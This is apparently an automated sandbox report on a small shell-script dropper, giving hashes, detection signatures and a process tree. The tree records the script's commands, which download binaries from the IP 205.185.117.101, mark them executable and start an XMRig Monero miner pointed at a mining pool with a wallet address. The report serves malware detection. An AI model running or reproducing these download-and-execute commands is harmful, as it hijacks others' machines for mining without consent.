Analysis
- max time kernel: 150s
- max time network: 153s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240729-en
- resource tags: arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 21/10/2024, 01:53
Static task
- static1
Behavioral tasks
- behavioral1: Sample 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh, Resource ubuntu1804-amd64-20240729-en
- behavioral2: Sample 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh, Resource debian9-armhf-20240611-en
- behavioral3: Sample 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh, Resource debian9-mipsbe-20240729-en
- behavioral4: Sample 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh, Resource debian9-mipsel-20240418-en
General
- Target: 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
- Size: 700B
- MD5: c4d089011765cf8fa828d28b6eeeac3e
- SHA1: 43d933e706b0eefd0db2b5acba19205ebc1af2bd
- SHA256: 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19
- SHA512: 3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9
Malware Config
Signatures
- XMRig Miner payload (2 IoCs)
  yara_rule matches: behavioral3/files/fstream-1.dat (family_xmrig); behavioral3/files/fstream-1.dat (xmrig)
- File and Directory Permissions Modification (1 TTPs, 22 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  chmod processes (PID): 809, 810, 811, 822, 823, 828, 829, 834, 835, 840, 845, 846, 851, 852, 856, 862, 863, 868, 869, 874, 879, 880
- Executes dropped EXE (13 IoCs)
  ioc (PID): /.__min__c (815); /.__min__ (817); /.__min__c (824); /.__min__c (830); /.__min__c (836); /.__min__ (842); /.__min__c (847); /.__min__c (853); /.__min__ (858); /.__min__c (864); /.__min__c (870); /.__min__ (876); /.__min__c (881)
- yara_rule match: behavioral3/files/fstream-2.dat (upx)
- Enumerates kernel/hardware configuration (1 TTPs, 1 IoCs)
  Reads contents of /sys virtual filesystem to enumerate system information.
  File opened for reading: /sys/devices/system/cpu (process: nproc)
- Reads runtime system information
  File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
- System Network Configuration Discovery (1 TTPs, 4 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes (PID): 817 .__min__, 842 .__min__, 858 .__min__, 876 .__min__
Processes
Process tree, one line per process (PID | depth | image | command line | signatures). Depth 1 is the submitted script; every depth-2 process was spawned beneath it.
- 700 | 1 | /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh | /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
- 702 | 2 | /usr/bin/wget | wget 205.185.117.101/log2 -O /dev/null
- 719 | 2 | /usr/bin/curl | curl -L 205.185.117.101/log2 -o /dev/null | Reads runtime system information
- 727 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__ -O /.__min__
- 804 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__c -O /.__min__c
- 805 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__m -O /.__min__m
- 809 | 2 | /bin/chmod | chmod +x /.__min__ | File and Directory Permissions Modification
- 810 | 2 | /bin/chmod | chmod +x /.__min__c | File and Directory Permissions Modification
- 811 | 2 | /bin/chmod | chmod +x /.__min__m | File and Directory Permissions Modification
- 812 | 2 | /usr/bin/nproc | nproc --all | Enumerates kernel/hardware configuration
- 814 | 2 | /bin/hostname | hostname
- 815 | 2 | /.__min__c | /.__min__c | Executes dropped EXE
- 817 | 2 | /.__min__ | /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k | Executes dropped EXE; System Network Configuration Discovery
- 819 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__ -O /.__min__
- 820 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__c -O /.__min__c
- 821 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__m -O /.__min__m
- 822 | 2 | /bin/chmod | chmod +x /.__min__c | File and Directory Permissions Modification
- 823 | 2 | /bin/chmod | chmod +x /.__min__m | File and Directory Permissions Modification
- 824 | 2 | /.__min__c | /.__min__c | Executes dropped EXE
- 826 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__c -O /.__min__c
- 827 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__m -O /.__min__m
- 828 | 2 | /bin/chmod | chmod +x /.__min__c | File and Directory Permissions Modification
- 829 | 2 | /bin/chmod | chmod +x /.__min__m | File and Directory Permissions Modification
- 830 | 2 | /.__min__c | /.__min__c | Executes dropped EXE
- 832 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__c -O /.__min__c
- 833 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__m -O /.__min__m
- 834 | 2 | /bin/chmod | chmod +x /.__min__c | File and Directory Permissions Modification
- 835 | 2 | /bin/chmod | chmod +x /.__min__m | File and Directory Permissions Modification
- 836 | 2 | /.__min__c | /.__min__c | Executes dropped EXE
- 838 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__c -O /.__min__c
- 839 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__m -O /.__min__m
- 840 | 2 | /bin/chmod | chmod +x /.__min__ | File and Directory Permissions Modification
- 841 | 2 | /bin/hostname | hostname
- 842 | 2 | /.__min__ | /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k | Executes dropped EXE; System Network Configuration Discovery
- 844 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__ -O /.__min__
- 845 | 2 | /bin/chmod | chmod +x /.__min__c | File and Directory Permissions Modification
- 846 | 2 | /bin/chmod | chmod +x /.__min__m | File and Directory Permissions Modification
- 847 | 2 | /.__min__c | /.__min__c | Executes dropped EXE
- 849 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__c -O /.__min__c
- 850 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__m -O /.__min__m
- 851 | 2 | /bin/chmod | chmod +x /.__min__c | File and Directory Permissions Modification
- 852 | 2 | /bin/chmod | chmod +x /.__min__m | File and Directory Permissions Modification
- 853 | 2 | /.__min__c | /.__min__c | Executes dropped EXE
- 855 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__c -O /.__min__c
- 856 | 2 | /bin/chmod | chmod +x /.__min__ | File and Directory Permissions Modification
- 857 | 2 | /bin/hostname | hostname
- 858 | 2 | /.__min__ | /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k | Executes dropped EXE; System Network Configuration Discovery
- 860 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__ -O /.__min__
- 861 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__m -O /.__min__m
- 862 | 2 | /bin/chmod | chmod +x /.__min__c | File and Directory Permissions Modification
- 863 | 2 | /bin/chmod | chmod +x /.__min__m | File and Directory Permissions Modification
- 864 | 2 | /.__min__c | /.__min__c | Executes dropped EXE
- 866 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__c -O /.__min__c
- 867 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__m -O /.__min__m
- 868 | 2 | /bin/chmod | chmod +x /.__min__c | File and Directory Permissions Modification
- 869 | 2 | /bin/chmod | chmod +x /.__min__m | File and Directory Permissions Modification
- 870 | 2 | /.__min__c | /.__min__c | Executes dropped EXE
- 872 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__c -O /.__min__c
- 873 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__m -O /.__min__m
- 874 | 2 | /bin/chmod | chmod +x /.__min__ | File and Directory Permissions Modification
- 875 | 2 | /bin/hostname | hostname
- 876 | 2 | /.__min__ | /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k | Executes dropped EXE; System Network Configuration Discovery
- 878 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__ -O /.__min__
- 879 | 2 | /bin/chmod | chmod +x /.__min__c | File and Directory Permissions Modification
- 880 | 2 | /bin/chmod | chmod +x /.__min__m | File and Directory Permissions Modification
- 881 | 2 | /.__min__c | /.__min__c | Executes dropped EXE
- 883 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__c -O /.__min__c
- 884 | 2 | /usr/bin/wget | wget 205.185.117.101/__min__m -O /.__min__m
Downloads
- Filesize: 8.2MB
  MD5: 8f96e8b4e9d26884c776c1b42a70bae5
  SHA1: 53a4166052211abf77e1edf0d71c7a6faae12cc5
  SHA256: 5e5fd0bc5f1bd663d7ccc2695c2b56bd382df3c7fdac605eb0ce3c0d5df24dc4
  SHA512: 4709a5ee74cf3e91472b64891eaf9cd7cd8bde6059be6fd892863274c505fd3cf5f5631d66d01ab645406adb76b6123d287d97e90a6c08bf8f8a935a6624dcec
- Filesize: 4.6MB
  MD5: a9667595bdc8bbe37b6365102751fe19
  SHA1: c2f53c873c3a0ae9939595fcea6c07bfc8573ace
  SHA256: a99f1e801f9109a1381b10f2651a3a76a8c490e7ab778258521c787bcecb3689
  SHA512: 21b9db3ad2116228853454f248082af8de637fcec4594ddabb66697c9a14a0a7aeff0618e259a2008b73abd6c23c8348c327b36cd830b4a444996a6bd488a69f
- Filesize: 1.6MB
  MD5: d3e378df1f5f920faaf9ef9e14a54f55
  SHA1: b039ff3865762819392cec53eeac7c8ee0a630c3
  SHA256: 58fa45ce3665fd665bde9589297a5a34c8df403e8732eb7bdc77d00c669fac29
  SHA512: 40ad13e858412d4d809d5eccb55c4e31ab65183f9064daea2d2b5e5bb311de4d43121337bb523ff1128cb9bd61319367de7e62f96ed2065b680f53371623d358
- Filesize: 2.9MB
  MD5: d98aa7684a42d8197b0eb2946c6d4fab
  SHA1: a5a7cb1c92f7c9ce302caaaab7d52f70ce7564da
  SHA256: bacd68209fed7455e465c223d55af9574e23616f94e52c1c10ee7a1b8673898e
  SHA512: e2cce2d0e96546bfe233e8294d49ed020db89c2a5968e57a2d84b9cd02cf71060805d765050792d81d0a238cf22eb41a030d6364256115bba5f43cb40f99b1ee